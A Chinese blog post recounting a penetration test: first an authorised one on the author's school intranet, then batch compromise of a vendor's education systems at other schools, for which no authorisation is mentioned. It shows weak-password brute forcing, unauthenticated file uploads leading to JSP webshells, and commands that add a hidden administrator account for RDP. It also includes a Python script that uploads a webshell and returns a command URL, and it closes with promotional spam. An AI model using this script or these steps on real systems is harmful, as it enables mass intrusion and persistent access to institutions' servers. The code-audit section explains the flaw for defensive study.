一次从内网到外网,黑盒到白盒的批量挖洞经历

前言:此次挖洞较为基础,分析得不足的地方望大佬指正。
内网挖洞
建议像我这样入门不久的可以拿自己学校内网练练手先(得授权),再在在教育行业SRC等漏洞平台上挖掘漏洞,赢得认可,获取些动力。<大佬的当我没说 0.0>
向信息中心的老师申请了对学校进行内网渗透测试的授权之后,便开始信息收集(亮神说的:渗透的本质是信息收集)。
因为在工作室辅助运维也知道服务器多在10.x.x.0/24这网段,这里我用Goby对该网段收集存活ip和端口。(因为真实ip可以绕过waf所以可以放开扫,当然其它大学就不一定了)

内网一堆漏洞emm,然后就可以用大佬的webalivescan批量扫一下Goby得的存活ip,获取标题,web指纹识别和简单的爆破一些目录
工具地址:https://github.com/broken5/WebAliveScan
然后先挑带登录标题的,目录扫描到登录的或敏感目录的软柿子开干,发现xx教学平台

没有验证码爆破,当然有的有验证码也可能虚的,根据自己学号推测 ,
例如 2018xx 一般是根据 入校年数+专业+班级+xx来设定的,爆破后4位得到弱口令:
2018xx 123456
然后常规的:xxx–>控制面版–>上传头像–>Getshell。
当然很多jsp马都没兼容,试了挺多这大佬的jsp马才成功
地址:https://github.com/threedr3am/JSP-Webshells

直接administrator权限,提权都省了
外网批量:
上面图有:技术支持:xx公司
FOFA搜索关键词:xxx有限公司

然后挑一个站,爆破,xx学校,学号通过谷歌语法来搜集。
如果收集不到,大多学校学号是如下规律:
2001 0077 入学的时间+报到位次
2018 031 01 05 入校年数+专业+班级+xx
2018 1 17 001 入学年+1本科学生+17xx招生专业代号,001这专业第一个学生。
爆破失败,才恍然大悟,可能未授权文件上传呢。
于是在burp将HOST地址改成目标的地址,发送数据包

一发入魂,成功上传图片,改jsp也没问题,欧克妥妥的未授权文件上传!
该网站Getshell后尝试3389登录:
net user mstlab mstlab /add : 添加用户并设置密码
net localgroup administrators mstlab /add : 将用户加入管理组
登录后在其桌面翻到敏感信息:测试账号和默认密码

同时这只是该公司的一个系统,又扩展到其它系统:(也大多成功上传)

但有些系统还是不行,于是用测试账号登录发现这些系统的第二处未授权文件上传,很老的FCKedito,可运行哥斯拉马

至此该公司的系统基本通杀

Exploit编写
当然少量写个html文件上传就ok了,这里较多站就写个一键返回shell脚本。下面的已脱敏

import requests
# 读取webshell文件,
file = open('shell.txt', 'r',encoding='utf-8')
shell = file.read()
#shell=""" <%  out.println("just4test!"); %>  """
headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"}
cookies={"JSESSIONID":"4F0ADEADB70AD18922C8C436837A5A3D", }
# 输入目标
url = input("input the TARGET(example:\[url\]https://127.0.0.1:1080\[/url\])>")
# 定义上传目录
upload\_url = url+"/xxx?action=xx"
#file参数files = {'file1': ('1.png', open('logo.png', 'rb'), 'image/png')}
files = {'file': ("shell.jsp", shell, "image/png")}
# 参见post内容
upload\_data = {"start": "forum\_update\_set", "forum\_update\_set": "updatacord", "forum\_nick": "11", "forum\_signature": " ", "forum\_pic\_2": " ", }
# 上传
upload\_res = requests.post(upload\_url, headers=headers,cookies=cookies, data=upload\_data, files=files)
# 此时会返回上传文件的路径
path = upload\_res.text
# 解析返回值获取上传地址
path = path\[path.find('data')+4:path.rfind('jsp') \]
# 再结合路径
shell\_url = url+"/dta"+path+"jsp?cmd=whoami"
# 返回结果,默认是system权限
print('shell is here:'+shell\_url)

白盒审计:
最近刚好入门了java web开发,虽然Getshell了,但也得了解漏洞原理吧。于是就打包源码,代码审计一下,看一下漏洞原理
源码一般在Tomcat 的 webapps 目录或者
Tomcat 下的 conf 目录\Catalina\localhost\ 下的配置文件
有自定义源码工程路径:如abc.xml内容:

<!-- 
Context 表示一个工程上下文 ,path 表示工程的访问路径:/abc ,
docBase 表示你的工程目录在哪里 
--> 
<Context path="/abc" docBase="E:\\book" ></Context>

访问这个工程的路径如下:http://ip:port/abc/ 就表示访问 E:\book 目录
然后我在Tomcat 的 webapps 找到源码并用哥斯拉的打包

第一个文件上传:
首先查看web.xml,看看全局的配置以及路由,先看filter过滤,可以看到filter类QDKFilte的位置

但我们的源码没有对应的java文件或者类,便看java依赖有对应的java包xxx.jar
反编译用IDEA的插件“Java Bytecode Decompiler”,插件安装使用可自行百度

反编译成功后得到对应xx.jar,注意要解压生成的jar包,即可得到java源码
然后filter类QDKFilte代码经过混淆,太烦杂,太多了并没找到session如何验证。。。。大佬请勿喷0.0我是菜鸡!!!

然后文件上传漏洞web.xml可以看到文件上传的类

var13从全局函数获取传递的参数和值

然后getFileExtendName(var13)直接获取后缀名并直接拼接起来,然后创建文件

跟进getFileExtendName()是直接获取后缀的

第二个文件上传漏洞的上传路径是
http:/ip:8080/xxx/FCKeditor/editor/xxx/jsp/upload.jsp

找到对应的文件:
和上面的类似用getFileExtendName()直接获取后缀的然后拼接没白黑名单

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安导师小李

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值